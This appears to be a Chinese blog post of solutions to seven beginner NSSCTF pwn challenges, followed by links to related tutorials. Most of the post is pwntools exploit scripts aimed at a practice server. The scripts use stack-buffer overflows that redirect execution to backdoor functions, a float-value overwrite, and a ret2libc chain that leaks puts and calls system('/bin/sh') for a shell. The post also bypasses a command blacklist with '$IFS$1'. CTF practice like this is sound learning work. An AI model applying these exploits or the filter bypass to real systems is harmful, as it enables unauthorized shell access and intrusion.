1 [SWPUCTF 2021 新生赛]nc签到

这不是欺负老实人嘛~

import osart = '''((  "####@@!!$$    ))`#####@@!$$`  ))((  '####@!!$:((  ,####@!!$:   )).###@!!$:`##@@!$:`#@!!$!@#    `#@!$:       @#$#$     `#@!$:       !@!'@!$:'`\   "!$: /`''\  '!: /'"\ : /"-."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']while True:command = input()for i in blacklist:if i in command:exit(0)os.system(command)

tac$IFS$1flag

2 [SWPUCTF 2021 新生赛]gift_pwn已解决

ret2fun.

from pwn import *day3 = remote("1.14.71.254", 28339)
# day3 = process("./ret2sys")
gift = 0x4005B6payload = b'a' * (0x10 + 8) + p64(gift)day3.sendline(payload)
day3.interactive()

3 [CISCN 2019华北]PWN1

这里的覆盖是数值，这里是0x41348000。这玩意表示浮点数，有点疑惑。

from pwn import *day3 = remote("1.14.71.254", 28907)
# day3 = process("./PWN1")payload = b'a' * (0x30 - 4) + p32(0x41348000)
day3.recvuntil("Let's guess the number.\n")day3.sendline(payload)
day3.interactive()

4 [SWPUCTF 2021 新生赛]whitegive_pwn

狗屎题目，没libc打不通。

from pwn import *
from LibcSearcher import *
io = remote('1.14.71.254', 28821)
elf = ELF('./ret2libc')pop_rdi_ret = 0x0000000000400763
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']payload1 = b'a' * 24 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(payload1)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))libc = LibcSearcher('puts', puts_addr)libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')payload2 = b'a' * 24 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
io.sendline(payload2)io.interactive()

5 [BJDCTF 2020]babystack2.0已解决

from pwn import *
day3 = remote("1.14.71.254",28058)
# day3 = process("./pwn")day3.recvuntil("your name:\n")
day3.sendline(b'-1')
backdoor = 0x400726payload = b'a' * 0x18 + p64(backdoor)
day3.sendline(payload)
day3.interactive()

6 [BJDCTF 2020]babystack

from pwn import *
day3 = remote("1.14.71.254",28582)
# day3 = process("./pwn")day3.recvuntil("your name:\n")
day3.sendline(b'100')
backdoor = 0x4006E6payload = b'a' * 0x18 + p64(backdoor)
day3.sendline(payload)
day3.interactive()

7 [watevrCTF 2019]Voting Machine 1已解决

from pwn import *
day3 = remote("1.14.71.254",28784)
# day3 = process("./Voting Machine")day3.recvuntil("Vote: ")
backdoor = 0x400807payload = b'a' * (0x2 + 8) + p64(backdoor)
day3.sendline(payload)
day3.interactive()

又做了几道简单题。。

NSSCTF PWN (入门)相关推荐

Linux pwn入门教程——CTF比赛
Linux pwn入门教程(1)--栈溢出基础 from:https://zhuanlan.zhihu.com/p/38985585 0x00 函数的进入与返回要想理解栈溢出,首先必须理解在汇编层面 ...
c# 定位内存快速增长_CTF丨Linux Pwn入门教程：针对函数重定位流程的相关测试（下）...
Linux Pwn入门教程系列分享已到尾声,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...
PWN入门系列教程~（1）
PWN入门系列教程~(1) 先来说下学习路线大致分为以下几个部分那么什么是PWN呢? 栈函数调用栈寄存器函数调用栈的经典内存布局先来说下学习路线大致分为以下几个部分学习基础:去学习一些 ...
Linux pwn入门教程,i春秋linux_pwn入门教程复现之栈溢出基础
i春秋linux_pwn入门教程复现之栈溢出基础演示进程总览 1: main函数 2: hello函数 3: getShell函数函数的入栈和出栈 1: F2断点于call hello 启动IDA ...
上一期文章说的关于PWN入门常见的问题
我要是有地方说错了一定要指出来啊嘤嘤嘤主要是因为有些地方感觉讲错了虽然是从我自己的角度来理解的,但是估计应该大概还是有帮助的(吧). 自己想的和群友提出来我自己收集的,涉及的问题有: 宝贝,怎么入 ...
Linux pwn入门教程,pwn堆入门系列教程1
pwn堆入门系列教程1 因为自己学堆的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门堆的人学习,第一篇教程研究了4天吧,途中没人指导. ...
pwn入门-PLT表与GOT表、libc入门
动态链接时,一个程序PLT表中的内容始终不变,仅在程序加载时修改GOT表中的内容.PLT表中的每个表项指向对应函数在GOT表中的地址(偏移),每次加载程序都相同.程序加载后GOT表中的每个表项保存的是 ...
乱七八糟的pwn入门（六）——5.passcode
审题首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h>void login(){int passcod ...
PWN入门（9）NX enabled，PIE enabled与返回LibC库
简介 "pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 'p' 与 ...

NSSCTF PWN (入门)

1 [SWPUCTF 2021 新生赛]nc签到

2 [SWPUCTF 2021 新生赛]gift_pwn已解决

3 [CISCN 2019华北]PWN1

4 [SWPUCTF 2021 新生赛]whitegive_pwn

5 [BJDCTF 2020]babystack2.0已解决

6 [BJDCTF 2020]babystack

7 [watevrCTF 2019]Voting Machine 1已解决

NSSCTF PWN (入门)相关推荐

最新文章

热门文章